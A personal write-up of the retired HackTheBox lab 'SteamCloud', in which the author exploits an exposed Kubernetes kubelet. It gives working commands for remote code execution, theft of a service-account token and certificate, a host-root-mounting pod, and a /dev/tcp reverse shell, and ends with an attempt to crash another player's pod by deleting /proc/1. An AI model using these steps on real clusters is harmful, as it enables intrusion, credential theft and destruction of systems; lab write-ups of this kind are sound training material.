HackTheBox: Steamclou

01/13/2024

This is a retired easy box that's free until mid-august.

Enumeration

Initial scan shows a LOT of ports open:


22/tcp    open  ssh
80/tcp    open  http
2379/tcp  open  etcd-client
2380/tcp  open  etcd-server
8443/tcp  open  https-alt
10249/tcp open  unknown
10250/tcp open  unknown
10256/tcp open  unknown

I suspect that the last three are dummy ports though; not technically false positives, but not relevant to this box. Ive noticed that with HTB boxes before. It could actually be ports opened by other players, maybe for reverse shells or something.

Script scan of just the open ports shows the following condensed info:


80:      nginx 1.14.2
2379:    ssl/etcd-server, commonName=steamcloud
2380:    ssl/etcd-server, commonName=steamcloud
8443:    ssl/https-alt

We get a 403 error when tying to access the https page on 8443. Interestingly, two of the HTTPS headers mention Kubernetes;


X-Kubernetes-Pf-Flowschema-Uid: def40b57-6b30-44bf-8ddf-99cff7e84c4c
X-Kubernetes-Pf-Prioritylevel-Uid: 92ad2766-c55b-4df8-b9cd-8c5cf52f6354

Nikto finds something potentially useful about port 8443:


Hostname '10.10.11.133' does not match certificate's names: minikube.

Assumedly this means that the target's hostname, or ONE of it's host names, it "minikube." Ill add that to /etc/hosts and see if anything changes. I also went ahead and added "steamcloud" and "steamcloud.htb", since they appeared in the nmap script scan.

/etc/hosts


10.10.11.133 minikube steamcloud steamcloud.htb

Nope, no luck with either HTTP or HTTPS on 8443 using any of those three names. Ill keep nikto running in the background while I do some research on "etcd-server" to see what that's all about.

Nikto only got a false-positive about a #wp-config.php file on the http server. For the https server on 8443, it identified the kubernetes header I saw earlier as well as one more:


+ /: Uncommon header 'x-kubernetes-pf-prioritylevel-uid' found, with contents: 92ad2766-c55b-4df8-b9cd-8c5cf52f6354.
+ /: Uncommon header 'x-kubernetes-pf-flowschema-uid' found, with contents: def40b57-6b30-44bf-8ddf-99cff7e84c4c.
+ /: Uncommon header 'audit-id' found, with contents: da0a1437-bfe2-4933-9df9-a751466223d8.

If UID means what I think it does, then these are probably some kind of user IDs embedded in the response. That may or may not be useful down the line.

Im still a complete newb to nginx, but from my own reading and also from hearing ippsec say it, it sounds like nginx is often used just as a reverse proxy in front of a server. So I assume what that means is that if we send the right HTTP requests, this nginx server may forward it somewhere else internally in the target and we might get a response. Not sure though.

Hold on: I don't know how the fuck this slipped by me in the first place, but the nmap script did something with DNS to resolve host name, and I totally ignored it. I dont know how it wouldve, since as far as I can tell there's no DNS gateway here. Let me go back and see what it said:

Nmap script scan also shows something else that for some reason didn't appear when I manually intercepted the request/response with Burp. Its a string in the response from port 8443 that looks interesting:


\x20cannot\x20get\x20path\x20\\\"/nice
SF:\x20ports,/Trinity\.txt\.bak\\\"\",\"reason\":\"Forbidden\"

Something about Trinity.txt.bak.

But for reference, this is all I see in Burp:


 "status": "Failure",
  "message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
  "reason": "Forbidden",
  "details": {

So I dont know where nmap is getting the whole "Trinity.txt.bak" thing...

Okay, apparently thats just an artifact of nmap. Googling trinity.txt.bak pulls up similar results and apparently its just an nmap thing.

Back to ports 2379 and 2380, these are "etcd" ports. I believe 2379 is client and 2380 is server, and it's a kubernetes-related protocol for what sounds like data synchronization. Apparently 'etcd' is a key-value store (almost like a database? eg 'key'='value'). It looks like there are metasploit modules for scanning these ports, and from what Ive seen it almost looks like it just brute-forces key names to see if it gets any values out. But not sure...

The nmap script scan identifies both etcd ports (client and server) as having commonName 'steamcloud'.

Research: What is kubernetes?

From the sounds of it, [[Kubernetes]] is a management system for container-based applications. It helps you manage services distributed between multiple hosts, each host running one or more containers used by the application. It sounds like the point of it is to assist scaling. One thing yo can do with it is set up automated backups, for example.

It appears that Kubernetes is basically an entire framework rather than one piece of software, and it basically has its own set of jargon terms.

Even though I probably COULD just look up an article on how to pentest kubernetes boxes, I may as well invest the time to actually learn what it's all about. It would serve me better in the long term; for one thing I might actually encounter Kubernetes in engineering, and Im sure Ill also see it again in different boxes.

Okay. So its a way of managing clusters of containers (which are NOT the same as virtual machines in that each container is not running it's own OS, from what I can tell).

![[Pasted image 20230724204838.png]] (That key-value store it shows is what is running on ports 2379 and 2380)

So the worker node(s) are the machines that run the actual containers, and the master node runs the control software that manages the worker nodes. Obviously the worker node and master node could be the same physical machine, I assume.

So that makes sense I guess. Now what is the key-value store?

It appears to be a relatively simple database that just associates values with key terms. Essentially its just a 2-column database where one column is the key and the other is the value. ==I dont know if you query it for a specific value or if you just dump the entire thing?==

Kubernetes uses distributed key-value stores, which spread the store over potentially multiple machines for the sake of parallelizing operations.

It stores ALL its data in a key-value store (Specifically etcd): config data,state, metadata, etc), and because Kubernetes has to manage distributed nodes, its database has to be accessible to those machines as well. Hence the 'distributed' key value store, it runs on a server.

Okay, so now we're getting somewhere. We would expect that the key-value store will hold all the config info for the kubernetes app.

Accessing the key-value store

At this step it looks like the best option would be to try and dump the key-value store's contents. From looking online there appear to be a couple ways of doing this. One option is to use metasploit, which has a scanner for etcd. The other is to try and do it manually using the etcd client (https://etcd.io/docs/v3.4/dev-guide/interacting_v3/).

The second option would require installing from source which I didnt feel like doing, and the metasploit module didnt work either. Let me check the walkthrough quickly:

Consulting the walkthrough

Looks like I didnt do my research well enough. Turns out port 10250 is actually what should have caught my attention; its the default port for a kubernetes extension called Rancher.

Also, port 8443 is actually the default port for the Kubernetes API (although other services use it too).

Should feel embarrassed about missing that; all it would have taken is a 5-second google search to figure out what it was.

The walkthrough ran the following command to dump data from port 10250:


$ curl https://10.10.11.133:10250/pods -k

(the -k flag ignores ssl cert warnings)

So obviously I didnt do my research. Anyway, that's enough of a hint. Ill go back to my own devices now

Back on my own

So port 10250 inidicates that this kubernetes system has "Rancher" installed. From its documentation,


The port **10250** on the `kubelet` is used by the `kube-apiserver` (running on hosts labeled as **Orchestration Plane**) for exec and logs. It’s very important to lock down access to this port, only the hosts labeled as **Orchestration Plane** should be able to access `kubelet` on port **10250**.

Here's a useful hacktricks page on kubernetes that discusses port 10250: https://cloud.hacktricks.xyz/pentesting-cloud/kubernetes-security/pentesting-kubernetes-services

According to hacktricks,


If you can list nodes you can get a list of kubelets endpoints with:

kubectl get nodes -o custom-columns='IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port' | grep -v KUBELET_PORT | while IFS='' read -r node; do

So I have to install kubectl which looks like a pain in the ass. Im also out of time for today so Ill pick it up tomorrow.

Back the next day, following writeup

For the sake of time, and because this is my first Kubernetes box, Im just going to use the writeup liberally. Im also going to do this the lazy way and not only do as much research as I need to, rather than research until I feel I understand Kubernetes completely.

It may not be the "right" way to do it, but when you only have 2 hours or less a day its hard not to cut some corners.

Where we left off, we had just dumped the list of pods using port 10250 (Rancher) using


curl -k https://10.10.11.133:10250/pods

Lets skim through this data and see what stands out.

Also, a quick note: This data appears to be in JSON form, and its much easier to read by just typing the url into the browser to have the browser format it.

So there appear to be 9 objects listed in the pods dump: 0) etcd-steamcloud 1) kube-apiserver-steamcloud 2) kube-controller-manager-steamcloud 3) kube-scheduler-steamcloud 4) 0xdf-pod 5) lewin 6) storage-provisioner 7) kube-proxy-9vxv7 8) coredns-78fcd69978-vx457 9) nginx

The writeup at this point decides to use a CLI tool called kubeletctl to interact with the system, and installs it as follows:


curl -LO
https://github.com/cyberark/kubeletctl/releases/download/v1.7/kubeletctl_linux_amd64
chmod a+x ./kubeletctl_linux_amd64
mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl

This kubeletctl tool can be used to scan for pods, account tokens, RCE vulnerabilities, etc.

I used the "scan rce" option to check for RCE vulns in any of the pods, and it found that 'nginx', 'kube-proxy-9vxv7', and '0xdf-pod' were all vulnerable.

==The walkthrough singled out the nginx pod, Im not totally sure why.== But he decided to target that one and try to run commands on there using the kubeletctl tool's "exec" command.

==Okay, just to clarify, a POD encloses one or more CONTAINERS.==

When you use kubeletctl to run commands through RCE you need to specify both the pod and the container as well as the server.

==How exactly does RCE through pods work?==

Anyway, following the writeup, I ran "id" on the nginx pod as follows:


$ kubeletctl exec "id" -p nginx -c nginx --server 10.10.11.133

uid=0(root) gid=0(root) groups=0(root)

Nice. Its root and I have RCE. The walkthrough didnt do this, but I also checked the other containers that came up as vulnerable for RCE. The '0xdf-pod' is also running as root, but the proxy one gave me an error.

Okay, lets get a reverse shell on the nginx one I guess. Im still not sure why he singles that one out, but Ill roll with it for the sake of time.


kubeletctl exec "bash -i >& /dev/tcp/10.10.14.12/9001 0>&1" -p nginx -c nginx --server 10.10.11.133

No luck there... and from viewing /etc/shadow in both containers, I can see there are no users besides root. I actually did find both the user and root flags by just exec'ing "find / -name root.txt" and "user.txt", but I assume thats not how your supposed to do it.

The writeup tries to priv esc by extracting the account token and SSL cert from the container so that it can use those creds to access the master node via the kubelet API on port 8443. From there the master node will think its the kubelet accessing it, and he will be able to run commands as that kubelet. Depending on the permissions of the kubelet, he will see what he can do.

Okay. Im pretty much just going through the motions right now. I get rougjly what's going on, but Im not sure how he knew where to look for each thing. Assumedly he just has experience with Kubernetes already, or he owns a crystal ball and didnt mention it. Whatever. Ill try not to get too pissed off at this one.

Grabbing the token and SSL cert for priv esc

Like I said, Im just following the writeup and not trying to figure it out myself.

This is basically what he did to grab the token and SSL cert, but with minor tweaks to skip a few steps:


$ kubeletctl exec "ls /var/run/secrets/kubernetes.io/serviceaccount" -p nginx -c nginx --server 10.10.11.133

ca.crt  namespace  token

$ token=`kubeletctl exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx --server 10.10.11.133`

$ echo $token

eyJhbGciOiJSUzI1NiIsImtpZCI6InJ6dU1LWmEzR3lheUR2ZVlBY3VSeFVlU2hnMEEzakRyUkxHLWtCSEg0eGsifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzIxODY1OTU5LCJpYXQiOjE2OTAzMjk5NTksImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjdlOTJiNmRjLTcxODktNDUzZS1iZGU0LWQxNTBmZjdmMTY1ZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjFkYzRkMWIzLTE1YjQtNDdkOS1iMjlkLWVjMzMxZjIxY2I5ZiJ9LCJ3YXJuYWZ0ZXIiOjE2OTAzMzM1NjZ9LCJuYmYiOjE2OTAzMjk5NTksInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.dFAPdtrIDUCWzG8SbliypM2NhMty-2iO8MQsI-eodRv9ULdvJRtSYiFY0Cc3BlcKqKLeuV5KsrQDct5nmUhHJymnX1dWrlHgnnR5WLDSKwFz0acxcyjiab7ZbJNNtDW4MOOdI7xBri0mOedw1PIWO3ePxFB2xucDW4leIQHQRqj8JX3M7XrrgJ0Ib4xHYAjcCeHIOhnsl4MrO3Dpsk4lqURUSa0gZbEdWxWcAISdDx1aKpSOIedooEUUtcwxOw-Qz5zac41JdR6pRJJllf-r2HijVmk-LW_IImKVvsA3MDLFMFx_XDzx7C267qXq63V47gv1nqLq3Xh4nAzJc2uylQ

$ kubeletctl exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx --server 10.10.11.133 >> ca.crt


$ cat ca.crt 

-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOoa
YRSqoSUfHaMBK44xXLLuFXNELhJrC/9O0R2Gpt8DuBNIW5ve+mgNxbOLTofhgQ0M
HLPTTxnfZ5VaavDH2GHiFrtfUWD/g7HA8aXn7cOCNxdf1k7M0X0QjPRB3Ug2cID7
deqATtnjZaXTk0VUyUp5Tq3vmwhVkPXDtROc7QaTR/AUeR1oxO9+mPo3ry6S2xqG
VeeRhpK6Ma3FpJB3oN0Kz5e6areAOpBP5cVFd68/Np3aecCLrxf2Qdz/d9Bpisll
hnRBjBwFDdzQVeIJRKhSAhczDbKP64bNi2K1ZU95k5YkodSgXyZmmkfgYORyg99o
1pRrbLrfNk6DE5S9VSUCAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBSpRKCEKbVtRsYEGRwyaVeonBdMCjANBgkqhkiG9w0BAQsFAAOCAQEA0jqg5pUm
lt1jIeLkYT1E6C5xykW0X8mOWzmok17rSMA2GYISqdbRcw72aocvdGJ2Z78X/HyO
DGSCkKaFqJ9+tvt1tRCZZS3hiI+sp4Tru5FttsGy1bV5sa+w/+2mJJzTjBElMJ/+
9mGEdIpuHqZ15HHYeZ83SQWcj0H0lZGpSriHbfxAIlgRvtYBfnciP6Wgcy+YuU/D
xpCJgRAw0IUgK74EdYNZAkrWuSOA0Ua8KiKuhklyZv38Jib3FvAo4JrBXlSjW/R0
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----

Okay. Now we have to install kubectl (the official kubernetes CLI) to use these creds to access the official API:


$ curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl

$ chmod +x kubectl 

$ sudo mv kubectl /usr/bin/kubectl

Okay. Now we connect to the API on port 8443 (this is verbatim from the writeup save for the IP):


$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME       READY   STATUS             RESTARTS       AGE
0xdf-pod   1/1     Running            0              14h
lewin      0/1     CrashLoopBackOff   36 (48s ago)   161m
nginx      1/1     Running            0              19h

Cool. So we can see the pods. This doesnt show all of the ones that kubeletctl did, I guess this only shows user-created pods.

Now he checks what permissions he has using


$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list

<SNIP>
pods          []                      []               [get create list]
</SNIP>

So this user can get, create, and list pods.

Honestly, from this point on I have no idea WTF the author of the writeup is doing. He makes a new pod using the same nginx image as the existing nginx container, mounts that image in the new pod, and then reads the files in the nginx container THROUGH the new pod he created with that image mounted inside. But he doesnt explain WHY, and it makes no fucking sense to do that, since youre already root on the existing nginx container. As in, I already found the fucking flags on it.

I truly dont see the point of what this guy is doing unless its just an exercise for the sake of learning how to do it. But since we used creds FOUND FROM THIS CONTAINER USING RCE to get this far, this step is completely fucking irrelevant...

This writeup by 0xdf is way better:

https://0xdf.gitlab.io/2022/02/14/htb-steamcloud.html

Okay, so I misunderstood what the other author was doing by creating another container. What hes actually doing is creating a container with the HOST MACHINE's system root "/" mounted within the container, NOT the "/root" dir of the nginx container. I was doubly confused. So basically hes creating another container that he can use to explore files on the machine hosting the kubernetes server. He doesnt technically have control over the host though, he's just able to view its file system. I also don't know if its a COPY of the host file system or if its actually synchronized and he can affect it. If he can write on the host filesystem, than I guess he could potentially GET RCE in a number of ways, depending on his permissions.

I am confused though. Is it normal for the host API to just let you mount the entire system root into a container? I would assume that could only happen through a major misconfiguration, like either running the API as root or having bad permission settings...

Oh well. Lets see if I can get actual RCE on the host.

ALSO: the 0xdf-pod is NOT supposed to be there. That was probably created by another user. So you really DO have to use this method to get the root flag on this box, I just didnt realize that I wasnt supposed to be able to see that box.

So to create a new box you need to make a .yaml file. There's one in the 0xdf writeup, so Ill just copy+paste that.


apiVersion: v1 
kind: Pod
metadata:
  name: not-part-of-the-ctf
  namespace: default
spec:
  containers:
  - name: not-part-of-the-ctf
    image: nginx:1.14.2
    volumeMounts: 
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:  
      path: /
  automountServiceAccountToken: true
  hostNetwork: true

(I changed the name from 0xdf-pod to "not-part-of-the-ctf" so that other players wouldnt make the same mistake hopefully)

Then create it using kubectl apply:


$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f malicious_pod.yaml 

pod/not-part-of-the-ctf created

Then list pods to confirm it was created and is running:



$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods                  

NAME                  READY   STATUS             RESTARTS        AGE
0xdf-pod              1/1     Running            0               15h
lewin                 0/1     CrashLoopBackOff   47 (4m2s ago)   3h41m
nginx                 1/1     Running            0               20h
not-part-of-the-ctf   0/1     CrashLoopBackOff   2 (26s ago)     51s

Aaaand... its not. It crashed.

I think its because the jerkoff who copy+pasted the '0xdf-pod' verbatim from the writeup never terminated it afterwards, and probably only one machine can mount the root at a time. Checking the 0xdf-pod's configuration using


$ kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pod 0xdf-pod -o yaml   

I can see that he did in fact just copy+paste, so I guess I can just finish the CTF through that container. Fucking twat. Im gonna see if I can get RCE and shut his down.

The 0xdf writeup credits one of his readers for pointing out that you CAN get a shell through kubeletctl without needing a reverse shell:


$ kubeletctl exec "/bin/bash" -p 0xdf-pod -c 0xdf-pod --server 10.10.11.133 

root@steamcloud:/# 

Beautiful. So now I have a root shell in this douchebag's box, which assumedly is hooked up to the host file system.

Got the flags. I tried to do some "extra credit" and shut down the 0xdf-box unsuccessfully, ran out of time. See "After rooting" for details

After rooting

Having to use the writeup took all the fun out of this one, and to be honest I had no real interest in learning about kubernetes. Oh well. I guess I still learned something.

I cant pretend to take credit for beating this or anything since I used the writeup for every part of this process.

==I am curious though, how exactly does the kubeletctl tool check for and execute RCE on a container? Read the source code if its available to find out.== I dont have the source code on my system since I just installed a binary, but it may be on Github.

I tried to shut down the other guy's pod to see if mine would work afterwards. Basically I got a root shell in his box by just running


$ kubeletctl exec "/bin/bash" -p 0xdf-pod -c 0xdf-pod --server 10.10.11.133 

and then I navigated into the host machine's file system which is in the pod's /mnt:


root@steamcloud:/# cd /mnt
cd /mnt

root@steamcloud:/mnt# ls
ls
bin   home            lib32       media  root  sys  vmlinuz
boot  initrd.img      lib64       mnt    run   tmp  vmlinuz.old
dev   initrd.img.old  libx32      opt    sbin  usr
etc   lib             lost+found  proc   srv   var

I suspected that this file system was 'live' and not just a copy of the original. To verify this I went to /proc (really /mnt/proc since this is just another device's file system mounted in /mnt), ran ls a few times, and saw that the PID numbers were actually changing; this confirms that it IS live file system from the host:


root@steamcloud:/mnt# cd proc
cd proc

root@steamcloud:/mnt/proc# ls
ls
1      1447  1693  26     36   617  82           interrupts    self
10     1449  17    2604   387  62   83           iomem         slabinfo
10806  1455  1733  2623   4    620  84           ioports       softirqs
11     1463  178   2662   407  63   85           irq           stat
11073  147   19    26692  452  64   86           kallsyms      swaps
11091  148   2     2680   455  65   87           kcore         sys
11349  149   20    27     456  66   9            key-users     sysrq-trigger
11367  15    2042  2706   54   67   97           keys          sysvipc
11394  150   21    2734   55   68   acpi         kmsg          thread-self
11411  151   2133  2752   56   680  buddyinfo    kpagecgroup   timer_list
11431  1517  2150  28     560  69   bus          kpagecount    tty
11554  152   22    29     561  70   cgroups      kpageflags    uptime
12     1524  2220  3      57   71   cmdline      loadavg       version
12448  1530  2238  30     578  72   consoles     locks         vmallocinfo
12464  1533  2276  30772  58   73   cpuinfo      meminfo       vmstat
12626  154   229   30791  582  74   crypto       misc          zoneinfo
12803  155   2297  31     585  75   devices      modules
13178  16    2298  31281  586  76   diskstats    mounts
13191  1612  23    32     588  77   dma          mtrr
13448  1634  2320  33     59   78   driver       net
13464  1639  24    34     591  79   execdomains  pagetypeinfo
13635  1656  2412  354    6    8    fb           partitions
[[13660]]  1672  2430  356    60   80   filesystems  sched_debug
14     1674  25    357    61   81   fs           schedstat

root@steamcloud:/mnt/proc# ls
ls
1      1447  1693  26     36   617  82           interrupts    self
10     1449  17    2604   387  62   83           iomem         slabinfo
10806  1455  1733  2623   4    620  84           ioports       softirqs
11     1463  178   2662   407  63   85           irq           stat
11073  147   19    26692  452  64   86           kallsyms      swaps
11091  148   2     2680   455  65   87           kcore         sys
11349  149   20    27     456  66   9            key-users     sysrq-trigger
11367  15    2042  2706   54   67   97           keys          sysvipc
11394  150   21    2734   55   68   acpi         kmsg          thread-self
11411  151   2133  2752   56   680  buddyinfo    kpagecgroup   timer_list
11431  1517  2150  28     560  69   bus          kpagecount    tty
11554  152   22    29     561  70   cgroups      kpageflags    uptime
12     1524  2220  3      57   71   cmdline      loadavg       version
12448  1530  2238  30     578  72   consoles     locks         vmallocinfo
12464  1533  2276  30772  58   73   cpuinfo      meminfo       vmstat
12626  154   229   30791  582  74   crypto       misc          zoneinfo
12803  155   2297  31     585  75   devices      modules
13178  16    2298  31281  586  76   diskstats    mounts
13191  1612  23    32     588  77   dma          mtrr
13448  1634  2320  33     59   78   driver       net
13464  1639  24    34     591  79   execdomains  pagetypeinfo
13635  1656  2412  354    6    8    fb           partitions
[[13661]]  1672  2430  356    60   80   filesystems  sched_debug
14     1674  25    357    61   81   fs           schedstat

Notice the PID number I put in brackets between the two times I ran ls. These are different, thus confirming that the file system is actually changing, which means it is live.

I tried to force the system to crash by running the following:


root@steamcloud:/mnt/proc# rm -r 1

Because PID 1 is /sbin/init, which is basically running the system:


root@steamcloud:/mnt/proc# cd 1
cd 1

root@steamcloud:/mnt/proc/1# ls
ls
attr             exe        mounts         projid_map    status
autogroup        fd         mountstats     root          syscall
auxv             fdinfo     net            sched         task
cgroup           gid_map    ns             schedstat     timers
clear_refs       io         numa_maps      sessionid     timerslack_ns
cmdline          limits     oom_adj        setgroups     uid_map
comm             loginuid   oom_score      smaps         wchan
coredump_filter  map_files  oom_score_adj  smaps_rollup
cpuset           maps       pagemap        stack
cwd              mem        patch_state    stat
environ          mountinfo  personality    statm

root@steamcloud:/mnt/proc/1# cat cmdline
/sbin/initroot